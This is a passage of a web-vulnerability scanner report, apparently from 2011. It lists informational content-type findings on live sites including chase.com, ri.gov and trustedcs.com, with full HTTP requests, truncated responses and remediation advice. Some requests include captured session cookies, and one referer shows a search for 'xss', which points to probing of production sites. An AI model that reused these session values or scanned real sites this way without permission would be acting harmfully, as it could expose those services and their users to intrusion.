<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

23.19. https://www.chase.com/online/Home/article/Homepage_pixel_frameset.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.chase.com
Path:	/online/Home/article/Homepage_pixel_frameset.htm

Request

GET /online/Home/article/Homepage_pixel_frameset.htm HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 15:28:52 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close
Content-Length: 625

<style type="text/css" media="screen">
</style><style type="text/css" media="screen">
</style><img border="0" alt="" width="1" height="1" src="https://segment-pixel.invitemedia.com/pixel?pixelID=51245
...[SNIP]...

23.20. https://www.chase.com/psmhelp/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.chase.com
Path:	/psmhelp/index.jsp

Request

GET /psmhelp/index.jsp?pg_name=shared/help/page/EandA_pendingapplication_HELP HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://chaseonline.chase.com/Public/Reidentify/ReidentifyFilterView.aspx?LOB=RBGLogon
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=b9MQTcyhWY1Tbh5GCQHJFKq72z0zG6mQXnl1rWXq79J6xhNQLw2f!1272186516

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:09:07 GMT
Content-length: 8345
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<html LANG="EN" >

<head>

<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/ChaseGlobal.css'/>

<script language="Javascript1.2" type="tex
...[SNIP]...

23.21. https://www.lowes.com/server-status previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/server-status

Request

Response

23.22. https://www.ri.gov/Licensing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/Licensing/

Request

GET /Licensing/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0; 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:33:59 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 19615
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.23. https://www.ri.gov/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/about/

Request

Response

23.24. https://www.ri.gov/about/awards.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/about/awards.php

Request

GET /about/awards.php HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:34:31 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 23077
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.25. https://www.ri.gov/about/staff.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/about/staff.php

Request

Response

23.26. https://www.ri.gov/government/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/government/

Request

GET /government/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Referer: https://www.ri.gov/visit/?tags=beaches
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.8.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:36:12 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 35434
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.27. https://www.ri.gov/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/help/

Request

GET /help/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:45:55 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 16846
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.28. https://www.ri.gov/img/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/img/favicon.ico

Request

GET /img/favicon.ico HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:34:12 GMT
Server: www
Last-Modified: Fri, 17 Apr 2009 20:47:13 GMT
ETag: "43a-467c649039640"
Accept-Ranges: bytes
Content-Length: 1082
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/plain

............ .$.......(............. ..................................l...l...l...l.@.................................................l...l...l...l...l...l...l. .l.P.l...l.p.l.0.....................l
...[SNIP]...

23.29. https://www.ri.gov/information/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/information/

Request

GET /information/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Referer: https://www.ri.gov/towns/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:46:08 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 37458
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.30. https://www.ri.gov/phonebook/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/phonebook/

Request

GET /phonebook/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Referer: https://www.ri.gov/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:34:41 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 17182
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.31. https://www.ri.gov/policies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/policies/

Request

GET /policies/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:34:37 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 15100
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.32. https://www.ri.gov/policies/access/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/policies/access/

Request

GET /policies/access/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:45:50 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 17046
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.33. https://www.ri.gov/policies/disclaimer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/policies/disclaimer/

Request

GET /policies/disclaimer/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Referer: https://www.ri.gov/policies/privacy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; font_level=0; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:45:24 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 15416
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.34. https://www.ri.gov/policies/legal/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/policies/legal/

Request

GET /policies/legal/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:45:40 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 16459
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.35. https://www.ri.gov/policies/links/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/policies/links/

Request

GET /policies/links/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:45:43 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 15827
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.36. https://www.ri.gov/policies/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/policies/privacy/

Request

GET /policies/privacy/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:34:34 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 18154
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.37. https://www.ri.gov/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/search/

Request

Response

23.38. https://www.ri.gov/towns/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/towns/

Request

GET /towns/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Referer: https://www.ri.gov/policies/disclaimer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.9.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:45:59 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 30535
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

23.39. https://www.ri.gov/type/junction_02-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/type/junction_02-webfont.woff

Request

GET /type/junction_02-webfont.woff HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Referer: https://www.ri.gov/Licensing/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0; 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:34:08 GMT
Server: www
Last-Modified: Thu, 14 Apr 2011 19:29:38 GMT
ETag: "64ec-4a0e5f22f8c80"
Accept-Ranges: bytes
Content-Length: 25836
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/plain

wOFF......d........x........................FFTM............[.. GDEF.......#...&....GPOS...........JD.?(GSUB....... ... l.t.OS/2.......I...`.d..cmap...T.......
....cvt .......F...F...1fpgm...D.......e
...[SNIP]...

23.40. https://www.ri.gov/visit/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ri.gov
Path:	/visit/

Request

GET /visit/ HTTP/1.1
Host: www.ri.gov
Connection: keep-alive
Referer: https://www.ri.gov/about/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.8.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:35:33 GMT
Server: www
Vary: Accept-Encoding
Content-Length: 27526
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!doctype html>



<!--[if IE 7 ]> <html lang="e
...[SNIP]...

24. Multiple content types specified previous next
There are 4 instances of this issue:

/
/SecurityBlanket/SecurityBlanket-FAQ.html
/SecurityBlanket/SecurityBlanket.html
/products/cross_domain.html

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

24.1. http://trustedcs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trustedcs.com
Path:	/

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: text/html
robots.txt
text/html; charset=utf-8

Request

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 18:09:00 GMT
Server: Apache
Last-Modified: Thu, 30 Jun 2011 18:05:27 GMT
ETag: "1d7a31-5e13-4e0cbae7"
Accept-Ranges: bytes
Content-Length: 24083
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>RAYTHEON TRUSTED
...[SNIP]...
</title>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="cross domain,cybersecurity,secureoffice,trusted gateway,OS lockdown,Simshield,Webshield,certification,accreditation,RedHat,Linux,guard,multilevel,access,transfer,truste
...[SNIP]...
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
<meta name="robots" http-equiv="Content-Type" content="robots.txt" />

<link rel="stylesheet" type="text/css" href="/css/TGS_reset.css" media="screen" />
...[SNIP]...

24.2. http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trustedcs.com
Path:	/SecurityBlanket/SecurityBlanket-FAQ.html

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

/robots.txt
Content-Type: text/html
text/html; charset=utf-8

Request

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 18:09:25 GMT
Server: Apache
Last-Modified: Thu, 09 Jun 2011 16:41:03 GMT
ETag: "3c541b-40c7-4df0f79f"
Accept-Ranges: bytes
Content-Length: 16583
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta name="keywords" content="Security Blanket,OS lockdown,cross domain,network security,cybersecurity,secureoffice,Linux lock down,Linux hardening, hardening,certification,accreditation,RedHat,Li
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<meta name="robots" http-equiv="Content-Type" content="/robots.txt" />

<link rel="stylesheet" type="text/css" href="/css/TGS_reset.css" media="screen">
...[SNIP]...

24.3. http://trustedcs.com/SecurityBlanket/SecurityBlanket.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trustedcs.com
Path:	/SecurityBlanket/SecurityBlanket.html

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

/robots.txt
Content-Type: text/html
text/html; charset=utf-8

Request

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 18:09:20 GMT
Server: Apache
Last-Modified: Tue, 05 Jul 2011 20:02:38 GMT
ETag: "3c540d-48a6-4e136dde"
Accept-Ranges: bytes
Content-Length: 18598
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta name="keywords" content="Security Blanket,OS lockdown,cross domain,network security,cybersecurity,secureoffice,Linux lock down,Linux hardening, hardening,certification,accreditation,RedHat,Li
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<meta name="robots" http-equiv="Content-Type" content="/robots.txt" />

<link rel="stylesheet" type="text/css" href="/css/TGS_reset.css" media="screen">
...[SNIP]...

24.4. http://trustedcs.com/products/cross_domain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trustedcs.com
Path:	/products/cross_domain.html

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

/robots.txt
Content-Type: text/html
text/html; charset=utf-8

Request

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 18:09:14 GMT
